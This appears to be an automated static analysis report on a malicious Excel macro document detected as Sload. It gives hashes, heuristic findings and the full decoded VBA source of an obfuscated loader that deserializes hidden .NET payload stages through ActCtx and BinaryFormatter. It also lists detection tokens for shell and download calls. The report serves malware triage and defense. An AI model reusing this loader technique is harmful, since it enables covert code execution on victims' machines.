Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 07d849cfb4210587…

MALICIOUS

Office (OOXML)

22.0 KB Created: 2020-10-18 03:49:25 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-10-25
MD5: 11962084071512d1332457222cd3cfdd SHA-1: 2522e750b6dcd19463682bb4398cae69800cd148 SHA-256: 07d849cfb421058793919bbabd51baffd2a1f5aa2856b57459d445ad83c6ed82
222 Risk Score

Heuristics 5

  • ClamAV: Xls.Malware.Sload-7135989-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Sload-7135989-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set kxdxtdqme = CreateObject(wrzrlpxsknyk("4d73786d6c322e444f4d446f") & wrzrlpxsknyk("63756d656e742e332e30"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3141 bytes
SHA-256: f4bcd61027a329ddbe68a46046313e523f93b4ba978600616806664aa81d50c2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function awwhcduwipshbqjnrt(ByVal enc)
Dim kxdxtdqme, zskjrflyfrhqvyz
Set kxdxtdqme = CreateObject(wrzrlpxsknyk("4d73786d6c322e444f4d446f") & wrzrlpxsknyk("63756d656e742e332e30"))
Set zskjrflyfrhqvyz = kxdxtdqme.CreateElement(wrzrlpxsknyk("62617365") & wrzrlpxsknyk("3634"))
zskjrflyfrhqvyz.DataType = wrzrlpxsknyk("62696e") & wrzrlpxsknyk("2e626173653634")
zskjrflyfrhqvyz.Text = enc
awwhcduwipshbqjnrt = zskjrflyfrhqvyz.nodeTypedValue
Set zskjrflyfrhqvyz = Nothing
Set kxdxtdqme = Nothing
End Function
Function muiaifrzxirnam()
Dim stage_1, stage_2
stage_1 = UserForm1.TextBox1.Text
stage_2 = UserForm1.TextBox2.Text
Dim enmdriuzkq As Object, wmnnwkuvwyaptjgofz As Object
Set uvzvjxjgoaqpyybepqg = CreateObject(wrzrlpxsknyk("4d6963726f736f66742e5769") & wrzrlpxsknyk("6e646f77732e416374437478"))
uvzvjxjgoaqpyybepqg.ManifestText = manifest
Set enmdriuzkq = uvzvjxjgoaqpyybepqg.CreateObject(wrzrlpxsknyk("53797374656d2e494f2e4d656d6f7279") & wrzrlpxsknyk("53747265616d"))
Set wmnnwkuvwyaptjgofz = uvzvjxjgoaqpyybepqg.CreateObject(wrzrlpxsknyk("5379737465") & wrzrlpxsknyk("6d2e52756e74696d652e53657269616c697a6174696f6e2e466f726d6174746572732e42696e6172792e42696e617279466f726d6174746572"))
Dim Decstage_1
Decstage_1 = awwhcduwipshbqjnrt(stage_1)
For Each i In Decstage_1
enmdriuzkq.WriteByte i
Next i
On Error Resume Next
enmdriuzkq.Position = 0
Dim sfluskmgogpwwd As Object
Set sfluskmgogpwwd = wmnnwkuvwyaptjgofz.Deserialize_2(enmdriuzkq)
If Err.Number <> 0 Then
Dim tcmbqwmbxzhhahf As Object
Set tcmbqwmbxzhhahf = uvzvjxjgoaqpyybepqg.CreateObject(wrzrlpxsknyk("53797374656d2e494f2e4d656d6f72") & wrzrlpxsknyk("7953747265616d"))
Dim Decstage_2
Decstage_2 = awwhcduwipshbqjnrt(stage_2)
For Each j In Decstage_2
tcmbqwmbxzhhahf.WriteByte j
Next j
tcmbqwmbxzhhahf.Position = 0
Dim jbbdqbps As Object
Set jbbdqbps = wmnnwkuvwyaptjgofz.Deserialize_2(tcmbqwmbxzhhahf)
End If
End Function
Private Function wrzrlpxsknyk(ByVal lxegrhweevcs As String) As String
Dim lyrlohdxdjob As Long
For lyrlohdxdjob = 1 To Len(lxegrhweevcs) Step 2
wrzrlpxsknyk = wrzrlpxsknyk & Chr$(Val("&H" & Mid$(lxegrhweevcs, lyrlohdxdjob, 2)))
Next lyrlohdxdjob
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1C57C88E-D6F0-470A-8248-5141820511FF}{DE0C0882-95D5-46F2-8B14-530C2A97D671}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 37888 bytes
SHA-256: 1baf4da25dea313e1570fcb885127655f209d12a0b5cf9a836956d5bcda166ae
Detection
ClamAV: Xls.Malware.Sload-7135989-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.